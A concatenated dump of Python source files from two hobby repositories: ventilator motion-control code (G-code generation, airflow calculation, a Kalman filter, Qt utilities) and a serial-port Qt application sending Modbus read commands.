img = image.Image("unittest/data/blobs.ppm", copy_to_fb=True)
blobs = img.find_blobs(thresholds, pixels_threshold=2000, area_threshold=200)
return blobs[0][0:-3] == (122, 41, 96, 81, 6228, 168, 82) and\
blobs[1][0:-3] == (44, 40, 77, 89, 5113, 80, 84) and\
blobs[2][0:-3] == (210, 40, 71, 82, 3890, 249, 76)
``` |
{
"source": "jibonaronno/Rhythm",
"score": 3
} |
#### File: jibonaronno/Rhythm/datalogger.py
```python
import sys
from os.path import join, dirname, abspath
from machinesetup import MachineSetup
import pprint
from backfeed import Backfeed
class DataLogger(object):
def __init__(self, filename="log6.txt"):
self.filename = filename
def writeBlock(self, datalist):
combined = ""
if len(datalist) > 0:
for data in datalist:
combined += data
with open(self.filename, "a+") as writer:
writer.write(combined)
'''
logger = DataLogger('log4.csv')
lData = []
def getStreamData(line):
if iCount < 10:
iCount += 1
if len(line > 15):
lData.append(line)
else:
iCount=0
logger.writeBlock(lData)
lData.clear()
if len(line > 15):
lData.append(line)
streamer = Backfeed('log2.txt')
streamer.setCallback(getStreamData)
streamer.StreamDirect()
#streamer.Start(1)
'''
```
#### File: jibonaronno/Rhythm/derivative.py
```python
import numpy
import matplotlib.pyplot as plott
import pprint
import math
def f(x):
return numpy.tan(x)
def f_diff(x):
return 1/numpy.cos(x)**2
def centered(x, h):
return (f(x+h) - f(x-h))/(2*h)
def forward(x, h):
return (f(x+h)-f(x))/h
def _forward(x, h):
return (math.sin(x+h)-math.sin(x))/h
x0 = 0.2
h_vector = [10**(-temp) for temp in numpy.arange(0, 17, 0.1)]
x_vector = [xvalue for xvalue in numpy.arange(0, numpy.pi, 0.1)]
sin_arr = numpy.zeros(len(x_vector))
deriv = numpy.zeros(len(x_vector))
deriv2 = numpy.zeros(len(x_vector))
for index, _sin in enumerate(x_vector):
sin_arr[index] = math.sin(_sin)
vector_len = len(sin_arr)
for index, _sin in enumerate(sin_arr):
if index < (vector_len - 1):
deriv[index] = forward(_sin, sin_arr[index+1])
deriv2[index] = _forward(x_vector[index], x_vector[index+1])
plott.plot(x_vector, sin_arr, label="_Sin_")
plott.plot(x_vector, deriv2, label="_Derivative")
#plott.loglog(x_vector, sin_arr, label="__Sin__")
'''
forward_res = numpy.zeros(len(h_vector))
centered_res = numpy.zeros(len(h_vector))
true_res = numpy.zeros(len(h_vector))
for index, _h in enumerate(h_vector):
forward_res[index] = forward(x0, _h)
centered_res[index] = centered(x0, _h)
true_res[index] = f_diff(x0)
x_array = [idx for idx in range(len(h_vector))]
x_arr = [idxx for idxx in numpy.arange(0, 17, 0.1)]
plott.figure(dpi=100)
#plott.loglog(x_array, true_res, label="true")
#plott.loglog(x_array, forward_res, label="Forward")
#plott.loglog(h_vector, abs(forward_res - true_res), label="Forward-true")
#plott.loglog(h_vector, abs(centered_res - true_res), label="Centered")
plott.loglog(x_arr, h_vector, label="h_vector")
'''
plott.grid()
plott.xlabel = "h"
plott.ylabel = "Absolute Difference"
plott.legend()
plott.show()
```
#### File: jibonaronno/Rhythm/flowprocess.py
```python
import math
import sys
from os.path import join, dirname, abspath
import json
import os
from flowsetup import JsonFlowSetup
import pprint
import math
from collections import deque
class FlowProcess(object):
def __init__(self):
self.sum_of_volume = 0.0
try:
config = JsonFlowSetup("flow.json")
self.D_inlet = float(config.dict["D_inlet"])
self.D_orifice = float(config.dict["D_orifice"])
self.P_air = float(config.dict["P_air"])
self.kcal = float(config.dict["kcal"])
self.diameter_ratio = self.D_orifice / self.D_inlet
self.orifice_area = (math.pi * (self.D_orifice * self.D_orifice)) / 4
self.inlet_area = (math.pi * (self.D_inlet * self.D_inlet)) / 4
self.CDD = self.orifice_area / self.inlet_area
self.Korifice = self.orifice_area * math.sqrt(2/(self.P_air * (1-(self.diameter_ratio ** 4)))) * self.kcal
except Exception as e:
print("error in flowprocess")
print(str(e))
self.flow = 0.0
def CalculateFlowConst(self, deltap):
if deltap < 0:
deltap = -deltap
return -math.sqrt((math.pi ** 2) * ((12 / 1000) ** 4) / 1.225 * 100 * deltap) * 1000
else:
return math.sqrt((math.pi ** 2) * ((12 / 1000) ** 4) / 1.225 * 100 * deltap) * 1000
def CalculateFlow(self, deltap):
result = 0.0
d_result = 0.0
try:
#if(deltap > 0):
if True:
#return self.CDD * self.Korifice * math.sqrt(deltap * 100)
result = (self.CDD ** 2) * (self.Korifice ** 2) * (deltap * 100)
if result > 0:
self.flow = math.sqrt(result)
self.Volume(self.flow)
return math.sqrt(result) * 60000
elif result < 0:
d_result = -result
self.flow = -math.sqrt(d_result)
self.Volume(self.flow)
return -math.sqrt(d_result) * 60000
else:
self.flow = 0.0
return 0.0
else:
return 0.0
except Exception as e:
print("Exception : flowprocess::CalculateFlow(...)")
print(str(e))
return self.flow
def sumofVolumes(self):
pass
flow_arr = deque()
sum_of_rmsVolume = 0.0
def rootVolume(self, flow):
rmsVolume = 0.0
self.flow_arr.append(flow)
if len(self.flow_arr) > 2:
self.flow_arr.popleft()
rmsVolume = math.sqrt((((self.flow_arr[0] + self.flow_arr[1]) / 2) ** 2) * 6.25)
if self.flow_arr[0] < 0:
self.sum_of_rmsVolume -= rmsVolume
else:
self.sum_of_rmsVolume += rmsVolume
return self.sum_of_rmsVolume
else:
return 0.0
def Volume(self, flow):
self.sum_of_volume += flow
return self.sum_of_volume
```
#### File: jibonaronno/Rhythm/flowsetup.py
```python
import math
import sys
from os.path import join, dirname, abspath
import json
import os
class JsonFlowSetup(object):
def __init__(self , location):
self.location = os.path.expandvars(location)
self.load(self.location)
#pprint.pprint(self.db[r'Columns'])
def load(self , location):
if os.path.exists(location):
self._load()
else:
print("location missing")
self.dict = {}
return True
def dumptojson(self):
try:
json.dump(self.dict , open(self.location, "w+"))
return True
except:
return False
def _load(self):
self.dict = json.load(open(self.location , "r"))
```
#### File: jibonaronno/Rhythm/gcodegenerator.py
```python
import math
import sys
from os.path import join, dirname, abspath
from machinesetup import MachineSetup
import pprint
from jsonobject import JsonObject
class GcodeGenerator(object):
def __init__(self, vt, rr, ie, fio2, x_adj):
self.vtfactor = 1.0
self.vt = vt
self.rr = rr
self.ie = ie
self.fio2 = fio2
self.x_adj = x_adj
self.ACC=1000
self.xmax = 75 #60
self.xamb = 40 #12
self.xrect = 30
self.xcon_offset = 5
self.vtmax = 5000
self.gcodebipap = ""
self.bipapstep = 0
self.gcodebipap_back = ""
self.machinesetup = MachineSetup()
self.ACC = self.machinesetup.ACC
self.xmax = self.machinesetup.xmax
self.xamb = self.machinesetup.xamb
self.xrect = self.machinesetup.xrect
self.xcon_offset = self.machinesetup.xcon_offset
self.vtmax = self.machinesetup.vtmax
self.motor_i_min = self.machinesetup.motor_i_min
self.presmm = self.machinesetup.presmm
self.postsmm = self.machinesetup.postsmm
self.home_sense = self.machinesetup.home_sense
self.ipap_tol = self.machinesetup.ipap_tol
self.vol_tol = self.machinesetup.vol_tol
print(str(self.ACC) + "," + str(self.xmax) + "," + str(self.xamb) + "," + str(self.xrect) + "," + str(self.xcon_offset) + "," + str(self.vtmax))
self.calib_dict = {250:63.0, 300:68.0, 350:71.0, 400:73.0, 450:77.0, 500:86.0, 550:100.0}
#self.calib_dict = {250:103.0, 300:108.0, 350:111.0, 400:113.0, 450:125.0, 500:126.0, 550:140.0}
self.jsobj = ''
self.loadVtTable()
def loadVtTable(self):
try:
self.jsobj = JsonObject("vttable.json")
pprint.pprint(self.jsobj.dict)
except Exception as e:
print('Exception at loadVtTable : ' + str(e))
def getAxisdistanceFromIpap(self, pparr, ipap):
try:
if len(pparr) > 0:
for itm in pparr:
if ipap == int(float(itm[1])) or ipap < int(float(itm[1])):
return itm[0]
return -1
except Exception as e:
print("pospressure table is empty")
pprint.pprint(e)
return -1
def ComputeBipap(self, pparr, ipap):
xmax = 5
xmax = self.getAxisdistanceFromIpap(pparr, ipap)
print(f"Axis Distance :: {xmax}")
if xmax == -1:
self.ComputeCMV()
print("Failed ComputeBipap()")
else:
self.ComputeMotion(xmax)
print("ComputeMotion(xmax=" + str(xmax) + ") @ IPAP :: " + str(ipap) )
def ComputeMotion(self, xmax_bp):
self.Dt = self.xmax - self.xrect
self.xav = self.xrect * (self.vt / self.vtmax)
'''xav will come from table as below'''
self.xav = self.calib_dict[self.vt]
self.Dp = xmax_bp #self.Dt + self.xav
self.TDMS = 0
self.Kie = 1/self.ie
self.BCT = 60*(1-0.24) / self.rr
self.Ti = self.BCT / (1 + (1 / self.Kie))
self.Th = self.BCT - self.Ti
self.midpart_ti=(1-self.ACC*self.Ti*self.Ti)/2
self.lastpart_ti=self.xav*self.xav/4
self.identifier_ti=math.sqrt(self.midpart_ti*self.midpart_ti-4*self.lastpart_ti)
self.sol1_ti=(-1*self.midpart_ti+self.identifier_ti)/2
self.sol2_ti=(-1*self.midpart_ti-self.identifier_ti)/2
if self.sol1_ti>self.xav:
if self.sol2_ti>self.xav:
self.dsmall_ti=0.1
else:
self.dsmall_ti=self.sol2_ti
else:
self.dsmall_ti=self.sol1_ti
#print(self.identifier_ti)
self.midpart_th=(1-self.ACC*self.Th*self.Th)/2
self.lastpart_th=self.xav*self.xav/4
self.identifier_th=math.sqrt(self.midpart_th*self.midpart_th-4*self.lastpart_th)
self.sol1_th=(-1*self.midpart_th+self.identifier_th)/2
self.sol2_th=(-1*self.midpart_th-self.identifier_th)/2
if self.sol1_th>self.xav:
if self.sol2_th>self.xav:
self.dsmall_th=0.1
else:
self.dsmall_th=self.sol2_th
else:
self.dsmall_th=self.sol1_th
#self.ACC_inhale = (4 * self.xav) / (self.Ti * self.Ti)
#self.ACC_exhale = (4 * self.xav) / (self.Th * self.Th)
#self.Vi = self.ACC_inhale * (self.Ti / 2) * 60
#self.Vh = self.ACC_exhale * (self.Th / 2) * 60
self.vimax=math.sqrt(2*self.dsmall_ti*self.ACC)
self.vhmax=math.sqrt(2*self.dsmall_th*self.ACC)
self.ViAvg = self.vimax * 60
#print(self.ViAvg)
self.Vi = self.ViAvg
self.VhAvg = self.vhmax* 60
self.Vh = self.VhAvg
xavv = 0
def ComputeCMV(self):
self.xavv = self.x_adj
self.Dt = self.xmax - self.xrect
#self.xav = self.calib_dict[self.vt]
#self.xav = self.xrect * (self.vt / self.vtmax) * self.vtfactor
try:
self.xav = self.calib_dict[self.vt] + self.xavv
print('Dict : ' + str(self.calib_dict[self.vt]))
except Exception as e:
print('ComputeCMV - ' + str(e))
#self.xav = self.xavv
#if self.xavv != 0:
#self.xav = self.xrect * ((self.vt + self.x_adj) / self.vtmax) * self.vtfactor
#Previous Dp self.Dp = self.Dt + self.xav
self.Dp = self.xav
self.TDMS = 0.5
self.Kie = 1/self.ie
self.BCT = 60*(1-0.32) / self.rr
self.Ti = self.BCT / (1 + (1 / self.Kie))
self.Th = self.BCT - self.Ti
self.midpart_ti=(1-self.ACC*self.Ti*self.Ti)/2
self.lastpart_ti=self.xav*self.xav/4
self.identifier_ti=math.sqrt(self.midpart_ti*self.midpart_ti-4*self.lastpart_ti)
self.sol1_ti=(-1*self.midpart_ti+self.identifier_ti)/2
self.sol2_ti=(-1*self.midpart_ti-self.identifier_ti)/2
if self.sol1_ti > self.xav:
if self.sol2_ti > self.xav:
self.dsmall_ti=0.1
else:
self.dsmall_ti=self.sol2_ti
else:
self.dsmall_ti=self.sol1_ti
#print(self.identifier_ti)
self.midpart_th=(1-self.ACC*self.Th*self.Th)/2
self.lastpart_th=self.xav*self.xav/4
self.identifier_th=math.sqrt(self.midpart_th*self.midpart_th-4*self.lastpart_th)
self.sol1_th=(-1*self.midpart_th+self.identifier_th)/2
self.sol2_th=(-1*self.midpart_th-self.identifier_th)/2
if self.sol1_th>self.xav:
if self.sol2_th>self.xav:
self.dsmall_th=0.1
else:
self.dsmall_th=self.sol2_th
else:
self.dsmall_th=self.sol1_th
#self.ACC_inhale = (4 * self.xav) / (self.Ti * self.Ti)
#self.ACC_exhale = (4 * self.xav) / (self.Th * self.Th)
#self.Vi = self.ACC_inhale * (self.Ti / 2) * 60
#self.Vh = self.ACC_exhale * (self.Th / 2) * 60
self.vimax=math.sqrt(2*self.dsmall_ti*self.ACC)
self.vhmax=math.sqrt(2*self.dsmall_th*self.ACC)
self.ViAvg = self.vimax * 60
#print(self.ViAvg)
self.Vi = self.ViAvg
self.VhAvg = self.vhmax* 60
self.Vh = self.VhAvg
def ComputeCMV2(self):
self.xavv = self.x_adj
self.Dt = self.xmax - self.xrect
initial_x = self.calib_dict[self.vt] #self.calib_dict[450]
#self.xav = self.calib_dict[self.vt]
#self.xav = self.xrect * (self.vt / self.vtmax) * self.vtfactor
try:
self.xav = initial_x + self.xavv
print('Dict : ' + str(initial_x))
except Exception as e:
print('ComputeCMV - ' + str(e))
#self.xav = self.xavv
#if self.xavv != 0:
#self.xav = self.xrect * ((self.vt + self.x_adj) / self.vtmax) * self.vtfactor
self.Dp = self.Dt + self.xav
# Mod self.Dp = self.xav
self.TDMS = 50
self.Kie = 1/self.ie
#self.BCT = 60*(1-(-0.5)) / self.rr
self.BCT = 60*(1-0.32) / self.rr
self.Ti = self.BCT / (1 + (1 / self.Kie))
self.Th = self.BCT - self.Ti
print('Ti-{:f} Th-{:f} BCT-{:f}'.format(self.Ti, self.Th, self.BCT))
self.midpart_ti=(1-self.ACC*self.Ti*self.Ti)/2
self.lastpart_ti=self.xav*self.xav/4
self.identifier_ti=math.sqrt(self.midpart_ti*self.midpart_ti-4*self.lastpart_ti)
self.sol1_ti=(-1*self.midpart_ti+self.identifier_ti)/2
self.sol2_ti=(-1*self.midpart_ti-self.identifier_ti)/2
if self.sol1_ti > self.xav:
if self.sol2_ti > self.xav:
self.dsmall_ti=0.1
else:
self.dsmall_ti=self.sol2_ti
else:
self.dsmall_ti=self.sol1_ti
#print(self.identifier_ti)
self.midpart_th=(1-self.ACC*self.Th*self.Th)/2
self.lastpart_th=self.xav*self.xav/4
self.identifier_th=math.sqrt(self.midpart_th*self.midpart_th-4*self.lastpart_th)
self.sol1_th=(-1*self.midpart_th+self.identifier_th)/2
self.sol2_th=(-1*self.midpart_th-self.identifier_th)/2
if self.sol1_th>self.xav:
if self.sol2_th>self.xav:
self.dsmall_th=0.1
else:
self.dsmall_th=self.sol2_th
else:
self.dsmall_th=self.sol1_th
#self.ACC_inhale = (4 * self.xav) / (self.Ti * self.Ti)
#self.ACC_exhale = (4 * self.xav) / (self.Th * self.Th)
#self.Vi = self.ACC_inhale * (self.Ti / 2) * 60
#self.Vh = self.ACC_exhale * (self.Th / 2) * 60
self.vimax=math.sqrt(2*self.dsmall_ti*self.ACC)
self.vhmax=math.sqrt(2*self.dsmall_th*self.ACC)
self.ViAvg = self.vimax * 60
#print(self.ViAvg)
self.Vi = self.ViAvg
self.VhAvg = self.vhmax* 60
self.Vh = self.VhAvg
def GenerateCMV(self):
self.ComputeCMV2()
self.gcodeinit = "G21\r\nG80\r\nG90\r\nM92 X" + str(self.presmm) +" Y"+ str(self.presmm) +"\r\nG28 X0Y0 F500\r\nM92 X" + str(self.postsmm) + " Y" + str(self.postsmm) + "\r\nM906 X"+ str(self.motor_i_min) + " Y" + str(self.motor_i_min) +"\r\nM201 X"+str(self.ACC)+" Y"+str(self.ACC)
self.gcodeprimary = "G21\r\nG80\r\nG90\r\nM92 X"+ str(self.presmm) +" Y"+ str(self.presmm) + "\r\nM914 X" + str(self.home_sense) + " Y" + str(self.home_sense) +"\r\nG28 X0Y0 F500\r\nM92 X"+ str(self.postsmm) +" Y"+ str(self.postsmm) + "\r\nM201 X"+str(self.ACC)+" Y"+str(self.ACC) + "\r\nM906 X"+ str(self.motor_i_min) + " Y" + str(self.motor_i_min) + "\r\nG01 X" + str(int(self.Dp)) + " Y" + str(int(self.Dp)) + " F500\r\n" + "G01 X" + str(int(self.Dt))+" Y"+str(int(self.Dt))+" F500\r\n"
#self.gcodeprimary = "G21\r\nG80\r\nG90\r\nM92 X"+ str(self.presmm) +" Y"+ str(self.presmm) +"\r\nG28 X0Y0 F500\r\nM92 X"+ str(self.postsmm) +" Y"+ str(self.postsmm) + "\r\nM201 X"+str(self.ACC)+" Y"+str(self.ACC) + "\r\nG01 X" + str(int(self.Dp)) + " Y" + str(int(self.Dp)) + " F500\r\n" + "G01 X" + str(int(self.Dt))+" Y"+str(int(self.Dt))+" F500\r\n"
#MOD self.gcodestr = "M107\r\nG01 X" + str(int(self.Dp))+" Y"+str(int(self.Dp))+" F"+str(int(self.ViAvg))+"\r\nM106 S255\r\nG04 P"+ str(self.TDMS) +"\r\n" +"G01 X"+str(int(self.Dt))+" Y"+str(int(self.Dt))+" F"+str(int(self.VhAvg))+"\r\n" #+"G04 P"+str(self.TDMS)+"\r\n"
self.gcodestr = "G01 X" + str(int(self.Dp))+" Y"+str(int(self.Dp))+" F"+str(int(self.ViAvg))+" \r\nG01 X"+str(int(self.Dt))+" Y"+str(int(self.Dt))+" F"+str(int(self.VhAvg))+"\r\n"
#self.gcodestr = "G01 X" + str(int(self.Dp))+" Y"+str(int(self.Dp))+" F"+str(int(self.ViAvg))+"\r\n" +"G01 X"+str(int(self.Dt))+" Y"+str(int(self.Dt))+" F"+str(int(self.VhAvg))+"\r\n"
#print(self.gcodeinit)
#print("\r\n")
##print("Gcode Primary : ")
##print(self.gcodeprimary)
#self.gcodestr = "M201 X" + str(int(self.ACC_inhale)) + " Y" + str(int(self.ACC_exhale)) + "\r\n" + " G01 X" + str(int(self.Dp))+" Y"+str(int(self.Dp))+" F"+str(int(self.Vi))+"\r\n"+ "M201 X"+ str(int(self.ACC_exhale)) + " Y"+ str(int(self.ACC_exhale)) + "\r\n" +" G01 X"+str(int(self.Dt))+" Y"+str(int(self.Dt))+" F"+str(int(self.Vh))+"\r\n" #+"G04 P"+str(self.TDMS)+"\r\n"
#with open('primary.gcode', 'w') as writer:
#writer.write(self.gcodeprimary)
def GenerateBiPAP(self, pparr, ipap):
self.ComputeBipap(pparr, ipap)
self.gcodeinit = "G21\r\nG80\r\nG90\r\nM92 X80 Y80\r\nG28 X0Y0 F500\r\nM92 X800 Y800\r\nM201 X"+str(self.ACC)+" Y"+str(self.ACC)
self.gcodeprimary = "G21\r\nG80\r\nG90\r\nG28 X0Y0 F500\r\nM92 X800 Y800\r\nM201 X"+str(self.ACC)+" Y"+str(self.ACC)+"\r\nG01 X" + str(int(self.Dp)) + " Y" + str(int(self.Dp)) + " F500\r\n" + "G01 X" + str(int(self.Dt))+" Y"+str(int(self.Dt))+" F500\r\n"
self.gcodestr = "M107\r\nG01 X" + str(int(self.Dp))+" Y"+str(int(self.Dp))+" F"+str(int(self.ViAvg))+"\r\nM106 S255\r\n" +"G01 X"+str(int(self.Dt))+" Y"+str(int(self.Dt))+" F"+str(int(self.VhAvg))+"\r\n" #+"G04 P"+str(self.TDMS)+"\r\n"
```
#### File: jibonaronno/Rhythm/kalman.py
```python
from random import normalvariate
##########################################################################
# "Real world" that we're trying to track
class RealWorld:
def __init__(self):
self.position = 0.0
self.velocity = 0.5
self.time_step = 0.1
self.time = 0.0
self.measure = None
# Noise on the measurements
self.measurement_variance = 3.0
# If we want to kink the profile.
self.change_after = 50
self.changed_velocity = -0.5
def measurement(self):
if self.measure == None:
self.measure = (self.position + normalvariate(0, self.measurement_variance))
return self.measure
def step(self):
self.time += self.time_step
self.position += self.velocity * self.time_step
if self.time >= self.change_after:
self.velocity = self.changed_velocity
self.measure = None
world = RealWorld()
##########################################################################
# Model
# Estimates
estimate_position = 0.0
estimate_velocity = 0.0
# Covariance matrix
P_xx = 0.1 # Variance of the position
P_xv = 0.1 # Covariance of position and velocity
P_vv = 0.1 # Variance of the velocity
##########################################################################
# Model parameters
position_process_variance = 0.01
velocity_process_variance = 0.01
R = 30.0 # Measurement noise variance
average_length = 30
data = []
print 'Time\tActual\tMeasurement\tPosition Estimate\tVelocity Estimate'
for i in range(1000):
world.step()
measurement = world.measurement()
# We need to boot strap the estimates for temperature and
# rate
if i == 0: # First measurement
estimate_position = measurement
elif i == 1: # Second measurement
estimate_velocity = ( measurement - estimate_position ) / world.time_step
estimate_position = measurement
else: # Can apply model
##################################################################
# Temporal update (predictive)
estimate_position += estimate_velocity * world.time_step
# Update covariance
P_xx += world.time_step * ( 2.0 * P_xv + world.time_step * P_vv )
P_xv += world.time_step * P_vv
P_xx += world.time_step * position_process_variance
P_vv += world.time_step * velocity_process_variance
##################################################################
# Observational update (reactive)
vi = 1.0 / ( P_xx + R )
kx = P_xx * vi
kv = P_xv * vi
estimate_position += (measurement - estimate_position) * kx
estimate_velocity += (measurement - estimate_position) * kv
P_xx *= ( 1 - kx )
P_xv *= ( 1 - kx )
P_vv -= kv * P_xv
print '\t'.join(str(x) for x in [world.time, world.position, measurement, estimate_position, estimate_velocity])
strx = ""
for x in [world.time, world.position, measurement, estimate_position, estimate_velocity]:
strx += str(x) + ","
strx += "\n"
with open("kalman.csv", "a+") as writer:
writer.write(strx)
```
#### File: jibonaronno/Rhythm/mdiwindow.py
```python
import sys
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5 import QtWidgets, uic
class MainWindow(QtWidgets.QMainWindow):
count = 0
def __init__(self, parent = None):
super(MainWindow, self).__init__(parent)
self.mdi = QMdiArea()
self.setCentralWidget(self.mdi)
bar = self.menuBar()
file = bar.addMenu("Subwindow")
file.addAction("window1")
file.addAction("text1")
file.addAction("text2")
file.triggered[QAction].connect(self.click)
self.setWindowTitle("Multiple window using MDI")
def click(self, q):
print ("New sub window")
if q.text() == "window1":
MainWindow.count = MainWindow.count+1
sub = QMdiSubWindow()
sub.setWidget(QTextEdit())
sub.setWindowTitle("subwindow"+str(MainWindow.count))
self.mdi.addSubWindow(sub)
sub.show()
if q.text() == "text1":
self.mdi.cascadeSubWindows()
if q.text() == "text2":
self.mdi.tileSubWindows()
def main():
app = QApplication(sys.argv)
ex = MainWindow()
ex.show()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
```
#### File: jibonaronno/Rhythm/modes.py
```python
import enum
class MachineRunModes(enum.Enum):
CMV = 1
BiPAP = 2
CPAP = 3
PS = 4
class BipapReturns(enum.Enum):
Continue = 1
Stop = 2
class BipapLookup(object):
def __init__(self):
self.ipap = 8.0
def setIpap(self, ipap=0.0):
self.ipap = ipap
def lookUp(self, pressure=0.0):
if pressure > self.ipap:
return True
else:
return False
```
#### File: jibonaronno/Rhythm/timerthread.py
```python
import sys
import serial
import pprint
import time
import enum
import queue
from queue import Queue
from os.path import join, dirname, abspath
from qtpy.QtCore import Slot, QTimer, QThread, Signal, QObject, Qt, QMutex
class TimerThread(QObject):
signal = Signal(str)
def __init__(self, callback, milis):
super().__init__()
self.milis = milis
self.signal.connect(callback)
self.thread = QThread()
self.timer = QTimer()
#self.timer.timeout.connect(self.timeout)
#self.timer.start(milis)
self.thread.started.connect(self.init)
def Start(self):
self.thread.start()
@Slot()
def init(self):
self.timer.timeout.connect(self.timeout)
self.timer.start(self.milis)
def timeout(self):
self.signal.emit("tick")
``` |
{
"source": "jibonaronno/RP2040AudioRecord",
"score": 2
} |
#### File: jibonaronno/RP2040AudioRecord/dispatchers.py
```python
import sys
import serial
from serial import Serial
import pprint
import time
import enum
import queue
from queue import Queue
from os.path import join, dirname, abspath
from qtpy.QtCore import Slot, QTimer, QThread, Signal, QObject, Qt, QMutex
class PrimaryThread(QObject):
signal = Signal(str)
def __init__(self, serialPort:Serial, cmdlist):
self.serialPort = serialPort
# self.json = JsonSettings("settings.json")
self.codelist = cmdlist
self.flagStop = False
self.pause = False
super().__init__()
def Stop(self):
self.flagStop = True
@Slot()
def run(self):
unit = []
hexformat = ''
inhex = ''
in_waiting = 0
while True:
try:
if self.pause:
time.sleep(100)
continue
jMessage = ""
try:
#if in_waiting != 0:
#unit = self.serialPort.read(in_waiting)
unit = self.serialPort.readline()
hexformat = unit.decode('ascii')
#for hx in unit:
# hexformat = hexformat + '{0}'.format(hx)
#self.signal.emit(str(hexformat))
self.signal.emit(str(hexformat))
except Exception as e:
print('Ex in sensor Thread readline() 49 : ' + str(e))
'''
for hx in unit:
hexformat = hexformat + '{0:02X} '.format(hx)
if hx == 13:
self.signal.emit(inhex + "- " + hexformat)
hexformat = ''
inhex = ''
unit = b''
'''
except serial.SerialException as ex:
print("Error In SerialException" + ex.strerror)
self.signal.emit("Stopped")
except Exception as e:
pprint.pprint(e)
self.signal.emit("Stopped")
class SensorThread(QObject):
signal = Signal(str)
plst = []
def __init__(self, serialPort, que):
self.pressureque = que
self.serialport = serialPort
self.flagStop = False
self.jMessage = ""
self._beep = False
self.flag_sensorlimit_tx = False
self.strdata = ""
super().__init__()
def Stop(self):
self.flagStop = True
def beep(self):
self._beep = True
def txsensordata(self, strdata):
self.strdata = strdata
self.flag_sensorlimit_tx = True
@Slot()
def run(self):
in_waiting = ''
jMessage = ""
unit = ''
itm = ''
while 1:
if self.flagStop:
break
try:
in_waiting = self.serialport.in_waiting
except Exception as e:
print('Ex:0X07 : ' + str(e))
while in_waiting == 0:
time.sleep(0.01)
try:
in_waiting = self.serialport.in_waiting
except Exception as e:
print('Ex:0x08 : ' + str(e))
try:
unit = self.serialport.read(in_waiting)
except Exception as e:
print('Ex in sensor Thread readline() 527 : ' + str(e))
if len(unit) > 0:
try:
itm += unit.decode('ascii')
except:
pass
if b'\n' in unit:
jMessage = itm # .decode('ascii')
itm = ''
# jMessage += ',' + str(time.perf_counter())
self.plst = jMessage.split(",")
self.signal.emit(jMessage)
if self.pressureque.qsize() <= 0:
self.pressureque.put(self.plst[0])
if self.flag_sensorlimit_tx:
self.flag_sensorlimit_tx = False
self.serialport.write(self.strdata.encode('utf-8'))
time.sleep(0.5)
```
#### File: jibonaronno/RP2040AudioRecord/main.py
```python
import sys
import enum
from os.path import join, dirname, abspath
import queue
import serial
from serial import Serial
import serial.tools.list_ports as port_list
from qtpy import uic
from qtpy.QtCore import Slot, QTimer, QThread, Signal, QObject, Qt
from qtpy.QtWidgets import QApplication, QMainWindow, QMessageBox, QAction, QDialog, QTableWidgetItem, QLabel
from pyqtgraph import PlotWidget
import pyqtgraph as pg
from collections import deque
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtGui import QPainter
from PyQt5 import QtCore, QtSvg
from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QGroupBox, QPushButton, QListWidget, QListWidgetItem
import math
import os
import numpy as np
import random
import qtmodern.styles
import qtmodern.windows
import time
import json
import pprint
from portdetection import DetectDevices
from dispatchers import PrimaryThread
from mimic import Mimic
from crud import CRUD
from dataview import DataView
from datetime import datetime
'''
Database codes are in crud.py file. here the object name is db. Accessed by self.db.
Implemented in sensordata(...) callback function. database file is flow.db .
'''
_UI = join(dirname(abspath(__file__)), 'top.ui')
_UI2 = join(dirname(abspath(__file__)), 'dashboard.ui')
_UI3 = join(dirname(abspath(__file__)), 'commands.ui')
'''
dev_address function_code reg_addr_high reg_addr-LOW, reg_qntt_high red_qntt_low crc_low crc_high
'''
#08 04 00 00 00 02 71 52
_CMD_1 = [0x08, 0x04, 0x00, 0x00, 0x00, 0x02, 0x71, 0x52]
_CMD_2 = [0x08, 0x04, 0x00, 0x00, 0x00, 0x02, 0x71, 0x52]
_CMD_3 = [0x08, 0x04, 0x00, 0x22, 0x00, 0x02, 0xD1, 0x58]
_CMD_4 = [0x08, 0x04, 0x00, 0x04, 0x00, 0x02, 0x30, 0x93]
_CMD_5 = [0x08, 0x04, 0x00, 0x00, 0x00, 0x02, 0x71, 0x52]
_CMD_6 = [0x08, 0x04, 0x00, 0x22, 0x00, 0x02, 0xD1, 0x58]
_CMD_7 = [0x08, 0x04, 0x00, 0x00, 0x00, 0x02, 0x71, 0x52]
_CMD_8 = [0x08, 0x04, 0x00, 0x04, 0x00, 0x02, 0x30, 0x93]
_CMD_9 = [0x09, 0x04, 0x00, 0x00, 0x00, 0x02, 0x70, 0x83]
_CMD_10 = [0x09, 0x04, 0x00, 0x00, 0x00, 0x02, 0x70, 0x83]
_CMD_11 = [0x09, 0x04, 0x00, 0x22, 0x00, 0x02, 0xD0, 0x89]
_CMD_12 = [0x09, 0x04, 0x00, 0x04, 0x00, 0x02, 0x31, 0x42]
_CMD_13 = [0x09, 0x04, 0x00, 0x00, 0x00, 0x02, 0x31, 0x42]
_CMD_14 = [0x09, 0x04, 0x00, 0x22, 0x00, 0x02, 0xD0, 0x89]
_CMD_15 = [0x09, 0x04, 0x00, 0x00, 0x00, 0x02, 0x70, 0x83]
_CMD_16 = [0x09, 0x04, 0x00, 0x04, 0x00, 0x02, 0x31, 0x42]
_CMD_17 = [0x0A, 0x04, 0x00, 0x00, 0x00, 0x02, 0x70, 0xB0]
_CMD_18 = [0x0A, 0x04, 0x00, 0x22, 0x00, 0x02, 0xD0, 0xBA]
_CMD_19 = [0x0A, 0x04, 0x00, 0x04, 0x00, 0x02, 0x31, 0x71]
class MainWindow(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
self.widget = uic.loadUi(_UI, self)
self.mimic = Mimic()
self.window_title = "top"
self.mimic = Mimic()
self.ports = DetectDevices()
self.selectedPort = ""
self.lst = QListWidget()
self.sensor = ''
self.sensorThread = ''
self.sensorThreadCreated = False
self.sensorPortOpen = False
self.sensorDataString = ""
self.serialSensor = ""
self.selectedPort = ""
self.cmdlist = []
self.cmdlist.append(_CMD_1)
self.cmdlist.append(_CMD_2)
self.cmdlist.append(_CMD_3)
self.cmdlist.append(_CMD_4)
self.cmdlist.append(_CMD_5)
self.cmdlist.append(_CMD_6)
self.cmdlist.append(_CMD_7)
self.cmdlist.append(_CMD_8)
self.cmdlist.append(_CMD_9)
self.cmdlist.append(_CMD_10)
self.cmdlist.append(_CMD_11)
